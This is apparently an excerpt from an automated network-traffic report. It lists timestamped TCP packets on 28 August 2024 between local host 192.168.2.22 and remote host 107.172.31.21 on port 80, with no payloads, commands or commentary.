Aug 28, 2024 06:54:13.568835974 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.568840981 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.568850994 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.568881035 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.568953991 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.568964958 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.568975925 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.568988085 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569000006 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569004059 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.569010973 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569029093 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569031954 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.569041967 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569046974 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.569097042 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.569127083 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569138050 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569149017 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569171906 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.569231033 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569242001 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569252014 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569262981 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569274902 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.569287062 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.569350004 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569360018 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569371939 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569384098 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569392920 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.569395065 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569406033 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569415092 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.569417953 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.569443941 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.571110010 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571152925 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571165085 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571170092 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.571202040 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.571208954 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571219921 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571230888 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571244001 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571249962 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.571276903 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.571499109 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571568012 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571579933 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571614981 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.571625948 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571636915 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571649075 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571665049 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571666956 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.571697950 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.571724892 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571737051 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571748018 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571759939 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.571773052 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.571804047 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.572433949 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.572443962 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.572454929 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.572485924 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.572527885 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.572539091 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.572547913 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.572560072 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.572568893 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.572575092 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.572583914 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.572607994 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.572618961 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.573112965 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.573129892 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.573139906 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.573165894 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.573252916 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.573263884 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.573273897 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.573286057 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.573297977 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.573298931 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.573323011 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.573338985 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.573349953 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.573359966 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.573379993 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.574141026 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.574158907 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.574170113 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.574193001 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.574207067 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.574218035 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.574228048 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.574240923 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.574248075 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.574275017 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.574323893 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.574333906 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.574343920 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.574354887 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.574367046 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.574398994 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.575158119 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575170040 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575179100 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575206041 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.575208902 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575257063 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.575510979 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575529099 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575540066 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575566053 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.575601101 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575612068 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575622082 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575628996 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575643063 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.575653076 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.575809002 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575819969 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575829983 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575843096 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.575850964 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.575876951 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.576417923 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.576432943 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.576443911 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.576468945 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.576495886 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.576507092 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.576517105 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.576539993 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.576606035 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.576617956 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.576628923 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.576647043 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.576658010 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.576668978 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.576680899 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.576689005 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.576693058 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.576704025 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.576736927 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.577320099 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577337980 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577383041 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.577506065 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577516079 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577527046 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577552080 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.577569962 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577580929 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577591896 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577604055 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577610970 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.577644110 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.577718019 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577728987 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577739000 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577754974 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577763081 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.577766895 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577779055 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577795982 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.577799082 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.577850103 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.578459978 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.578469992 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.578480959 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.578506947 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.578532934 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.578543901 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.578553915 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.578572035 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.578572989 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.578584909 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.578617096 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.578661919 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.578672886 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.578682899 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.578696966 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.578701973 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.578736067 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.579279900 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579292059 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579301119 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579328060 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.579353094 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579364061 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579375029 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579386950 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579392910 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.579425097 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.579446077 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579457045 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579468012 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579497099 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.579525948 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579538107 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579547882 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579559088 CEST  80  49172  107.172.31.21  192.168.2.22
Aug 28, 2024 06:54:13.579571009 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.579602957 CEST  49172  80  192.168.2.22  107.172.31.21
Aug 28, 2024 06:54:13.580195904 CEST  80  49172  107.172.31.21  192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580239058 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580250978 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580281973 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.580313921 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580324888 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580334902 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580347061 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580358028 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.580384016 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.580431938 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580442905 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580456018 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580467939 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580476046 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.580478907 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.580503941 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581069946 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581082106 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581091881 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581115007 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581141949 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581152916 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581163883 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581176043 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581187010 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581204891 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581283092 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581295013 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581310034 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581322908 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581332922 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581335068 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581346035 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581357956 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.581363916 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581409931 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.581983089 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.582000017 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.582010031 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.582046986 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596020937 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596033096 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596044064 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596070051 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596097946 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596110106 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596120119 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596146107 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596205950 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596218109 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596229076 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596246004 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596265078 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596275091 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596293926 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596307993 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596350908 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596756935 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596769094 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596812963 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.596842051 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596921921 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596932888 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596944094 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.596962929 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.597141981 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597153902 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597163916 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597192049 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.597259998 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597271919 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597281933 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597291946 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597301960 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.597325087 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.597358942 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597369909 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597381115 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597429037 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.597867012 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597877979 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597887993 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597912073 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.597970963 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597982883 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.597994089 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598005056 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598011017 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598036051 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598074913 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598084927 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598095894 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598099947 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598119020 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598140001 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598582983 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598637104 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598648071 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598680973 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598701954 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598712921 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598723888 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598737955 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598747015 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598767042 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598849058 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598860025 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598869085 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598880053 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598891973 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598892927 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.598901033 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.598937035 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.599492073 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599502087 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599513054 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599539995 CEST4917280192.168.2.22107.172.31.21
                                                                      Aug 28, 2024 06:54:13.599575043 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599586964 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599597931 CEST8049172107.172.31.21192.168.2.22
                                                                      Aug 28, 2024 06:54:13.599610090 CEST8049172107.172.31.21192.168.2.22
